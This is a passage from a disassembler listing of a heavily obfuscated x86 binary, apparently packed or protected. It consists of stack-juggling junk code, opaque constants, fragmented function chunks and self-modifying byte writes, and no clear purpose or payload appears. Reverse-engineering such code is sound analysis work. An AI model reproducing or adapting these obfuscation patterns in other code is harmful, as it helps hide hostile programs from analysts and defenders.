		jmp	loc_48D3AA
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0, 0F7h, 0D1h

; =============== S U B	R O U T	I N E =======================================



sub_48CA73	proc near		; CODE XREF: sub_48DE75-4224p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 452CF900h
		xchg	eax, [esp-4+arg_0]
		push	offset loc_48A088
		jmp	nullsub_578
sub_48CA73	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_587. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_48CA8B	proc near		; DATA XREF: sub_48DE75-38E9o

; FUNCTION CHUNK AT 0048CA21 SIZE 0000000E BYTES

		push	ecx
		push	ecx
		mov	ecx, offset loc_48B749
		jmp	loc_48CA21
sub_48CA8B	endp

; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFE609h
		db 0
; ---------------------------------------------------------------------------

loc_48CAA1:				; CODE XREF: eu81y7qg:00489D7Cj
		call	sub_48C97D

loc_48CAA6:				; CODE XREF: eu81y7qg:loc_48CF1Aj
		test	edi, 1000000h
		jmp	loc_48E865
; ---------------------------------------------------------------------------
		db 2 dup(0), 87h
		dd 487243Ch, 58F88B24h,	0FFCC9CE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

; =============== S U B	R O U T	I N E =======================================



sub_48CAC2	proc near		; CODE XREF: sub_48D900j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00489908 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B44B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048BF64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C19D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048C1B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CC2E SIZE 0000001A BYTES

		xchg	ebp, [esp+0]
		jmp	loc_489908
sub_48CAC2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		or	edx, 0F854DE2Dh

loc_48CAD2:				; CODE XREF: eu81y7qg:0048D811j
		xor	eax, 37B56EAEh
		call	sub_48DC25
		add	bh, al
		add	[ecx], eax
		add	[ecx], al
		add	cl, al
		add	eax, offset loc_48B590
		call	sub_48C617
; ---------------------------------------------------------------------------
		db 0
		dd 1EABE900h, 0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
		jmp	loc_48A04A
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CB00:				; CODE XREF: sub_48DE75+5CBj
		call	loc_48BBC8
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CB06:				; CODE XREF: sub_48DE75-AC1j
		mov	byte ptr [eax],	0F6h
		pop	eax
		add	esi, 0FDB4E0BFh
		add	esi, ebp
		add	esi, 0FF6F5CFh
		mov	[esi], eax
		pop	esi
		call	sub_48EA14
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 82E90000h, 1Bh, 0FFF5BDE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

locret_48CB2F:				; CODE XREF: eu81y7qg:loc_48C418j
		retn
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BAD9

loc_48CB31:				; CODE XREF: sub_48BAD9+1Dj
		jmp	loc_48D9B0
; END OF FUNCTION CHUNK	FOR sub_48BAD9
; ---------------------------------------------------------------------------
		align 4

loc_48CB38:				; CODE XREF: eu81y7qg:0048C240j
		mov	byte ptr [ebx],	87h
		pop	ebx
		mov	esi, eax
		push	34h
		and	al, 56h
		mov	esi, eax
		xchg	esi, [esp]
		jmp	loc_48D3E7
; ---------------------------------------------------------------------------
		db 0, 0C3h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CB4F:				; CODE XREF: sub_48DE75-200Dj
		jmp	loc_48C642
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CB56:				; CODE XREF: sub_48DE75-3CF6j
		jmp	nullsub_582
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 4
		dd 0F00C300h, 0FFF61481h, 9E810FFFh, 52FFFFF9h,	0EA0B1E68h
					; DATA XREF: eu81y7qg:loc_48CC16o
		dd 0E14CE8F5h, 0EDE9FFFFh, 0FFFFE6h
; ---------------------------------------------------------------------------

loc_48CB7C:				; CODE XREF: eu81y7qg:0048AA66j
		jmp	loc_48D233
; ---------------------------------------------------------------------------
		align 2

loc_48CB82:				; CODE XREF: eu81y7qg:0048B430j
		jns	loc_48BEA9

; =============== S U B	R O U T	I N E =======================================



sub_48CB88	proc near		; CODE XREF: sub_48DE75-4514p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048A541 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A632 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048A65E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C585 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D70B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048D83E SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[esi], eax
		jmp	loc_48C585
sub_48CB88	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		xchg	edx, [esp]
		pop	edx
		push	eax
		pushf
		push	0C184C4DBh
		pop	eax
		jmp	loc_48D4CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D1F9

loc_48CBA5:				; CODE XREF: sub_48D1F9-14DDj
		mov	byte ptr [esi],	3
		pop	esi
		push	eax
		mov	eax, ebx
		xchg	eax, [esp+0]
		mov	ebx, offset byte_48C7E3
		jmp	loc_48C56D
; END OF FUNCTION CHUNK	FOR sub_48D1F9
; ---------------------------------------------------------------------------
		db 2 dup(0), 33h
		dd 1CD581CDh, 0E90D1655h, 2193h
; ---------------------------------------------------------------------------

loc_48CBC8:				; CODE XREF: eu81y7qg:00489C8Dj
		add	esi, 60104CB6h

loc_48CBCE:				; DATA XREF: eu81y7qg:0048A6E7o
		adc	al, 0C6h
		pop	esi
		call	sub_48A895
		jmp	loc_48B590
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A5B4

loc_48CBDD:				; CODE XREF: sub_48A5B4+B2Cj
		mov	byte ptr [ebx],	0Fh
		pop	ebx
		add	edi, 3600E9h
		test	eax, edi
		push	offset byte_48C8BB
		jmp	nullsub_570
; END OF FUNCTION CHUNK	FOR sub_48A5B4
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48CBF4	proc near		; CODE XREF: sub_48DE75-116Aj
					; eu81y7qg:loc_48D806p
		xchg	ecx, [esp+0]
		pop	ecx
		mov	byte ptr [esi],	8Bh
		pop	esi
		push	offset loc_48B1B3
		jmp	locret_48DFBB
sub_48CBF4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		pop	eax
		push	48BB1Eh
		jmp	loc_48E065
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CC16:				; DATA XREF: eu81y7qg:0048C5C6o
		lea	eax, dword_48CB5C+3
		push	edx
		mov	edx, esi
		xchg	edx, [esp]
		push	0EE96690h
		pop	esi
		jmp	loc_48E8B8
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48CAC2

loc_48CC2E:				; CODE XREF: sub_48CAC2:loc_48BF64j
		rol	ecx, 3
		sub	ecx, 0A9E60516h
		or	ecx, 4D4CDDF8h
		add	ecx, 2F9D659h
		jmp	loc_48C1B0
; END OF FUNCTION CHUNK	FOR sub_48CAC2
; ---------------------------------------------------------------------------
		dd 0D1810000h, 4F9F778h, 0FFF0F9E9h, 2B0000FFh,	1938E9C6h
		dd 4870000h, 58F08B24h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_48CC65:				; CODE XREF: eu81y7qg:loc_48B8ADj
		jmp	loc_48D806
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_594. PRESS KEYPAD	"+" TO EXPAND]
		align 4
; START	OF FUNCTION CHUNK FOR sub_4894B7

loc_48CC6C:				; CODE XREF: sub_4894B7+6j
		jmp	loc_48DA0F
; END OF FUNCTION CHUNK	FOR sub_4894B7
; ---------------------------------------------------------------------------
		db 2Bh,	0C8h, 0E9h
		dd 0FFFFFD03h, 5A241487h, 0E9E8F503h, 0FFFFEFh,	0DC7D6800h
		dd 4FE90048h, 87FFFFCFh, 81582404h, 0AB84C7C2h,	24145AC7h
		dd 0FFDAD4E9h, 0A0E800FFh, 9
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B19F

loc_48CCA9:				; CODE XREF: sub_48B19F:loc_48B123j
		pop	edx
		pop	eax
		add	eax, 7C07B66Eh
		test	eax, 4000h
		jmp	loc_48B6B4
; END OF FUNCTION CHUNK	FOR sub_48B19F

; =============== S U B	R O U T	I N E =======================================



sub_48CCBC	proc near

; FUNCTION CHUNK AT 0048D327 SIZE 00000011 BYTES

		xchg	edx, [esp+0]
		xchg	eax, [esp+0]
		add	edx, 5993B5C9h
		jmp	loc_48D327
sub_48CCBC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	eax, 94C189E0h
		jmp	loc_48D997
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CCD8:				; CODE XREF: sub_48DE75:loc_48B802j
		mov	edx, ebx
		pop	ebx
		rol	edx, 8
		sub	edx, 0F90BB3EDh
		and	edx, 754AFB64h
		jmp	loc_489C56
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 10h
		dd 24C08100h, 8B76D24Dh, 0A6FD6800h, 47E90048h,	0Ch
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CD05:				; CODE XREF: sub_48DE75+543j
		xor	esi, 4FD35DC3h
		jmp	sub_48CBF4
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		dd 68560000h, 9DF29BAh,	54C6815Eh, 81FBC1F7h, 14791FEEh
		dd 0EE7FE987h, 0FFFFh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_48CD2D:				; CODE XREF: eu81y7qg:0048A0D5j
		jmp	loc_48CF3B
; ---------------------------------------------------------------------------
		dw 6800h
		dd offset loc_48BA9A
		dd 0FFF7C0E9h, 0F5F00FFh, 0FFEAF383h, 1912E9FFh
		db 2 dup(0)
word_48CD4A	dw 0F368h		; DATA XREF: sub_48DE75+7A0o
		dd 0E90048DFh, 0FFFFE8E4h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CD56:				; DATA XREF: eu81y7qg:0048B2AFo
		add	eax, 9E48A835h
		popf
		xchg	eax, [esp]
		jmp	loc_48DC45
; ---------------------------------------------------------------------------
		align 2
		push	offset loc_48D268
		jmp	locret_48EB3D
; ---------------------------------------------------------------------------
		dd 6C2AF781h, 1FE9A10Ch, 2BFFFFF3h, 908A0FDAh, 0E900001Fh
		dd 893h
; ---------------------------------------------------------------------------

locret_48CD88:				; CODE XREF: eu81y7qg:0048B757j
		retn
; ---------------------------------------------------------------------------

loc_48CD89:				; CODE XREF: eu81y7qg:0048CFAFj
		jmp	locret_48C593
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48CD8F:				; CODE XREF: eu81y7qg:0048A7C1j
		jmp	loc_48B061
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48CD96:				; CODE XREF: eu81y7qg:0048C974j
		retn
; ---------------------------------------------------------------------------

loc_48CD97:				; CODE XREF: eu81y7qg:0048EE6Bj
		jmp	locret_48B470
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CD9E:				; CODE XREF: eu81y7qg:0048B20Dj
		pop	ebx
		and	eax, 4B4F0F18h
		or	eax, 83DDB7D3h

loc_48CDAB:				; CODE XREF: eu81y7qg:0048C172j
		sub	eax, 84A74FADh
		add	eax, 0B90E0EC0h
		push	esi
		jmp	loc_48E258
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		dd 0C2810000h, 86144063h, 0E924147Dh, 2090h, 0A2936800h
		dd 6EE90048h, 87FFFFEAh, 8D59240Ch, 48AA9F05h, 0C300C600h
		dd 0C86E8h
		db 0
byte_48CDED	db 0C6h, 1, 87h		; DATA XREF: eu81y7qg:loc_48AD03o
		dd 9D02C659h, 0E4EFE95Ah, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A5B4

loc_48CDFC:				; CODE XREF: sub_48A5B4:loc_48B542j
		call	sub_48BD75
		jmp	loc_48B0CE
; END OF FUNCTION CHUNK	FOR sub_48A5B4
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48CE07:				; CODE XREF: eu81y7qg:0048B46Aj
		jmp	loc_48D1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CE0C:				; CODE XREF: sub_48DE75-4313j
		mov	edi, 87E22167h
; END OF FUNCTION CHUNK	FOR sub_48DE75

; =============== S U B	R O U T	I N E =======================================



sub_48CE11	proc near		; CODE XREF: eu81y7qg:loc_489834p

; FUNCTION CHUNK AT 00489ADF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489EBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A4F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AFB7 SIZE 00000017 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	9116611Fh
		pop	edx
		jmp	loc_489ADF
sub_48CE11	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CE21:				; CODE XREF: sub_48DE75:loc_48DFE3j
		lea	eax, dword_48E794
		call	sub_48A3C7

loc_48CE2C:				; CODE XREF: sub_48E917:loc_48EE34j
		mov	byte ptr [edx],	0F6h
		pop	edx
		call	sub_48CFEF
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
dword_48CE38	dd 0F57922E2h, 0DE80E920h, 0C6C3FFFFh, 3C878706h, 5FF78B24h
		dd 87D68B52h, 820F2414h, 0FFFFF42Dh, 0FFD80CE9h
		db 0FFh, 0
word_48CE5E	dw 6857h		; DATA XREF: sub_48DE75-3CFBo
		dd 97E6D94Fh, 0FCC7815Fh, 0E9D765CCh, 0FFFFC81Bh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CE72:				; CODE XREF: eu81y7qg:0048B3BFj
		pop	edx
		push	offset aHapzXbrMbASl ; "h §½Xàš;ÛŒÀ\bÅs‹"
		jmp	loc_48C5B1
; ---------------------------------------------------------------------------
		test	ebp, edx
		jmp	loc_48D338
; ---------------------------------------------------------------------------
		dd 0DA810000h, 65EC6565h, 0EB811187h, 0F5F42474h, 0F2CC870Fh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48CE9A:				; CODE XREF: sub_48B258:loc_48B6EDj
		cmp	ebx, 77C165BDh
		jmp	loc_48AADC
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		align 2
		dw 0C6C1h
		dd 0D6C68105h, 0D800250Bh, 68E92434h, 0FFFFF5h,	1ED6E800h
		db 3 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48CEBF	proc near		; CODE XREF: eu81y7qg:0048EEA1p

; FUNCTION CHUNK AT 00489F4F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048A1A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A8D2 SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	eax, ebx
		pop	ebx
		jmp	loc_48A1A8
sub_48CEBF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edx, [edi]
		cmp	eax, ecx
		jmp	loc_48E3DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DD69

loc_48CED4:				; CODE XREF: sub_48DD69-1384j
		sub	ebx, 7387A147h
		add	ebx, 87CDA64Ch
		add	eax, ebx
		xchg	edi, [esp+0]
		mov	ebx, edi
		pop	edi
		jmp	loc_48DFBC
; END OF FUNCTION CHUNK	FOR sub_48DD69
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 5068Bh, 0DFBAE900h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48CEFA:				; CODE XREF: eu81y7qg:0048C9B4j
		jb	loc_48B8AD

loc_48CF00:				; CODE XREF: eu81y7qg:loc_48A9BCj
		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp]
		mov	edi, offset loc_48A600
		jmp	loc_48BDD7
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48CF12:				; CODE XREF: eu81y7qg:0048C0C8j
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C617

loc_48CF15:				; CODE XREF: sub_48C617+7j
		jmp	loc_48D3B9
; END OF FUNCTION CHUNK	FOR sub_48C617
; ---------------------------------------------------------------------------

loc_48CF1A:				; CODE XREF: eu81y7qg:0048B0C9j
		jmp	loc_48CAA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AD49

loc_48CF1F:				; CODE XREF: sub_48AD49+8j
		jmp	loc_48E037
; END OF FUNCTION CHUNK	FOR sub_48AD49
; ---------------------------------------------------------------------------
		dd 0C870000h, 830F5924h, 0FFFFDB02h, 48DF3368h,	0FB61E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48CF3B:				; CODE XREF: eu81y7qg:loc_48CD2Dj
		mov	byte ptr [eax],	87h
		pop	eax
		xchg	ebp, [esp]
		mov	edx, ebp
		pop	ebp
		jmp	loc_48C91A
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B258

loc_48CF4C:				; CODE XREF: sub_48B258:loc_48A7B7j
		mov	byte ptr [esi],	3
		xchg	ebp, [esp+0]
		mov	esi, ebp
		pop	ebp
		xor	ebx, 0DD8BE75Dh
		cmp	ebx, 0FEAB1D89h
		jmp	loc_48B6ED
; END OF FUNCTION CHUNK	FOR sub_48B258
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_607. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0C3h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48CF6D:				; CODE XREF: sub_48DE75-1C58j
		jmp	loc_48D4A9
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------

loc_48CF72:				; CODE XREF: eu81y7qg:0048A6A1j
		call	sub_48D968
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ED10

loc_48CF78:				; CODE XREF: sub_48ED10-4635j
		jmp	loc_48A0DA
; END OF FUNCTION CHUNK	FOR sub_48ED10
; ---------------------------------------------------------------------------
		align 2

; =============== S U B	R O U T	I N E =======================================



sub_48CF7E	proc near		; CODE XREF: eu81y7qg:00489D5Aj
					; eu81y7qg:loc_48BAA0p

; FUNCTION CHUNK AT 0048A167 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A4BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AFFD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B2DB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048B4D4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048BEC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C42B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0048C5B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C84C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048D8EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048E7F3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		jno	loc_48C42B
		mov	edx, [eax]
		or	edx, edx
		jmp	loc_48AFFD
sub_48CF7E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0), 68h
		dd offset dword_48AF54+28h
		dd 0FFCC3BE9h
		db 0FFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D9C3

loc_48CF9D:				; CODE XREF: sub_48D9C3-1A88j
		test	eax, ebx
		jmp	near ptr loc_48A5F1+1
; END OF FUNCTION CHUNK	FOR sub_48D9C3
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48CFA6:				; CODE XREF: eu81y7qg:loc_48BD42j
		mov	byte ptr [ebx],	0C6h
		pop	ebx
		push	48B7B2h
		jmp	loc_48CD89
; ---------------------------------------------------------------------------
		dd 800F0000h, 0FFFFE9CDh, 0EFC1FA23h, 0ADE88103h, 0F84A74Fh
		dd 0FFD31685h, 0F10B00FFh, 1DE6E9h, 0C3000000h,	0FFECB0E9h
		dd 0C527E9FFh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48CFE3:				; CODE XREF: eu81y7qg:loc_48A3C1j
					; eu81y7qg:0048B94Bj
		jmp	locret_48D052
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A24C

loc_48CFE8:				; CODE XREF: sub_48A24C+7j
		jmp	loc_48C93D
; END OF FUNCTION CHUNK	FOR sub_48A24C
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48CFEF	proc near		; CODE XREF: eu81y7qg:0048BA51j
					; sub_48DE75-1045p

; FUNCTION CHUNK AT 0048A7A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E936 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048EBA6 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	ebx, 25699713h
		add	ebx, ebp
		add	ebx, 0D2C022A9h
		jmp	loc_48E936
sub_48CFEF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 4ED6F781h, 0D2685577h, 0E90048E5h, 0FFFFEFC2h
		db 2 dup(0)
word_48D01A	dw 0F281h		; DATA XREF: sub_48B258:loc_48EC6Eo
		dd 7C856D95h
dword_48D020	dd 0C281D503h, 631EAB9h, 2AF6128Bh, 0B0E9A43Ch,	0FFFFF7h
					; DATA XREF: sub_48D1F9:loc_48BD17o
		dd 0BD9D6668h, 24148702h, 815AC28Bh, 0F0C7B6E0h, 0BDC88140h
		dd 0E9E46B10h, 329h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48D052:				; CODE XREF: eu81y7qg:loc_48CFE3j
		retn
; ---------------------------------------------------------------------------

loc_48D053:				; DATA XREF: eu81y7qg:0048B946o
		push	0D90C0B08h
		pop	esi
		and	esi, 6BC2BEEAh
		jmp	loc_48DE1A
; ---------------------------------------------------------------------------
		dd 6C1C100h, 0FFF97FE8h, 0C98EE9FFh
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C117

loc_48D072:				; CODE XREF: sub_48C117+Aj
		jmp	loc_48D2FD
; END OF FUNCTION CHUNK	FOR sub_48C117
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BA3A

loc_48D077:				; CODE XREF: sub_48BA3A+10j
		jmp	near ptr dword_48AF54+1
; END OF FUNCTION CHUNK	FOR sub_48BA3A
; ---------------------------------------------------------------------------
		dd 8B0F0000h, 0FFFFF978h, 0DD31880Fh, 0D581FFFFh, 37BB3722h
		dd 7788F081h, 31E92971h
		db 0F7h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48AB88

loc_48D09B:				; CODE XREF: sub_48AB88:loc_48C062j
		mov	esi, offset byte_48B219
		jmp	loc_48B9A8
; END OF FUNCTION CHUNK	FOR sub_48AB88
; ---------------------------------------------------------------------------
		align 2

loc_48D0A6:				; CODE XREF: eu81y7qg:0048C0D0j
		mov	ebp, edi
		call	sub_48EB80
		popf
		jmp	near ptr dword_4897E8+2
; ---------------------------------------------------------------------------

loc_48D0B3:				; CODE XREF: eu81y7qg:00489CB9j
		xor	eax, ecx
		add	edi, 0FAC04168h

loc_48D0BB:				; CODE XREF: eu81y7qg:loc_489849j
		jmp	loc_48E920
; ---------------------------------------------------------------------------

loc_48D0C0:				; CODE XREF: eu81y7qg:0048EE24j
		mov	byte ptr [eax],	87h
		pop	eax
		push	edx
		pop	eax

loc_48D0C6:				; DATA XREF: eu81y7qg:loc_48EE1Fo
		pop	ds
		add	al, 24h
		jmp	loc_48E8E7
; ---------------------------------------------------------------------------
		align 10h
		xchg	ebx, [esp]
		pop	ebx
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		push	0A2736Fh
		xchg	ebp, [esp]
		jmp	loc_48BADE
; ---------------------------------------------------------------------------
		align 4
		dd 0C875955h, 68EC8B24h, 48E41Ah, 0FFD72CE9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48C27A

loc_48D0FA:				; CODE XREF: sub_48C27A+17BDj
		push	0E0351E84h
		pop	edx
		and	edx, 118C10E4h
		or	edx, 0E4852FA1h
		jmp	loc_48A989
; END OF FUNCTION CHUNK	FOR sub_48C27A
; ---------------------------------------------------------------------------
byte_48D111	db 0, 15h, 0C0h		; DATA XREF: eu81y7qg:0048B786o
; ---------------------------------------------------------------------------
		rol	byte ptr [ebp+0], 51h
		push	0CC1BE74Ch
		xchg	ebp, [esp]
		mov	ecx, ebp
		pop	ebp
		jmp	loc_48D6D2
; ---------------------------------------------------------------------------
		dd 0B9C68100h, 872E31DCh, 15FF2434h, 45C0C0h, 48965768h
		dd 1976E900h, 45C70000h, 726956E8h, 0F3BE5674h,	0E90048DDh
		dd 0FFFFCB78h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48D156:				; CODE XREF: eu81y7qg:loc_48BE11j
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 57E9D785h, 0FFFFCEh

; =============== S U B	R O U T	I N E =======================================



sub_48D160	proc near		; CODE XREF: eu81y7qg:0048A510j
					; sub_48DE75-2965p

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx

loc_48D164:				; CODE XREF: eu81y7qg:loc_48BC2Bj
		mov	edx, [edx]
		xchg	edx, [esp-4+arg_0]
		call	sub_48C2E0

locret_48D16E:				; CODE XREF: eu81y7qg:loc_48D983j
		retn
sub_48D160	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
		db 0
byte_48D171	db 56h,	68h, 0D9h	; DATA XREF: eu81y7qg:0048C387o
		dd 0E90048DCh, 0FFFFEEDBh, 95DB6800h, 7CE90048h, 0C1000005h
		dd 0DAE910E7h, 0FFFFE5h, 0C37DBA00h, 22E90048h,	3000015h
		dd 0C3D3E8C5h, 0FFFFh, 416E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE75

loc_48D1AA:				; CODE XREF: sub_48DE75-2F27j
		jmp	nullsub_584
; END OF FUNCTION CHUNK	FOR sub_48DE75
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_48D1B1:				; CODE XREF: eu81y7qg:loc_48CE07j
		mov	esi, [esi]
		push	offset loc_48A6F1
		jmp	loc_48A658
; ---------------------------------------------------------------------------
		align 2

loc_48D1BE:				; DATA XREF: eu81y7qg:00489829o
		push	ecx
		mov	ecx, ebx
		xchg	ecx, [esp]
		mov	ebx, 48971Eh
		jmp	loc_48A154
; ---------------------------------------------------------------------------
		align 10h

loc_48D1D0:				; CODE XREF: eu81y7qg:0048AC74j
		jno	near ptr dword_48A9C8+46h
		xchg	edi, [esp]
		pop	edi
		mov	ebx, [ebx]
		xchg	ebx, [esp]
		call	eax
		jmp	near ptr byte_489C15+2
; ---------------------------------------------------------------------------
		dw 5F00h

; =============== S U B	R O U T	I N E =======================================



sub_48D1E8	proc near		; CODE XREF: eu81y7qg:0048EBF6p
		xchg	eax, [esp+0]
		pop	eax
		push	48B31Fh
		jmp	nullsub_605
sub_48D1E8	endp

; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_563. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_48D1F9	proc near		; DATA XREF: sub_48A70F-D3Do

; FUNCTION CHUNK AT 0048BD17 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C56D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048CBA5 SIZE 00000014 BYTES
